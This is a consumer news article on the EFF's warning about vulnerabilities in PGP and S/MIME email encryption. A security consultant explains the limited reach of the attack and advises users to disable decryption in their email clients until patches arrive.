The Electronic Frontier Foundation says people using secure email servers should find a new way to send and receive sensitive information.
The group cites new research warning of “serious vulnerabilities” in PGP, including GPG and S/MIME, the most popular email encryption standards.
The researchers say the flaw can allow an attacker to use the victim’s own email client to decrypt previously acquired messages and return the decrypted content to the attacker without alerting the victim.
“EFF is advising PGP users to pause in their use of the tool and seek other modes of secure end-to-end communication for now,” the group said in a statement.
A few mitigating factors
Dominic Chorafakis, principal consultant at cybersecurity consulting firm Akouto, says it's a serious issue for people who depend on encrypted email.
“There are, however, a few mitigating factors that significantly limit the scope of the issue, as far as the average consumer is concerned,” Chorafakis told ConsumerAffairs. “For one thing, the vast majority of consumers don’t use email encryption at all. The main reason is that it can be complicated to set up and isn’t supported by all email clients.”
Chorafakis says the attack is also fairly complex. The attacker must already have the encrypted message in their possession and then send a modified version back to the victim to trick their email client into exposing the encrypted information.
“Theoretically, encrypted email messages can be intercepted as they travel across the internet, but in reality that is not easy for the average hacker to do,” he said. “The most likely method an attacker might use to get their hands on a person’s encrypted email message is by hacking into their account. As a result, carrying out this attack requires a degree of tailoring and targeting, which is not something often seen on a large scale that impacts the average email user.”
What to do
That said, the issue isn't one consumers should ignore. It's prudent to check to see if your email uses PGP or S/MIME. Chorafakis says setting up either one isn't exactly simple, so if you don't remember doing it, chances are you aren't using it, and therefore have nothing to be concerned about.
If someone else set up your email client, it might be wise to ask them if your system is vulnerable.
“For individuals who are using PGP or S/MIME, the safest thing to do for now is to disable decryption in the email client until the vendor has provided a patch to mitigate the issue, and use an external program to do the encryption and decryption,” Chorafakis said.
Chorafakis is not a fan of sending sensitive data by email, no matter how secure the system is. If email has to be used, he suggests using a file encryption tool to encrypt the information, then sending it as an attachment.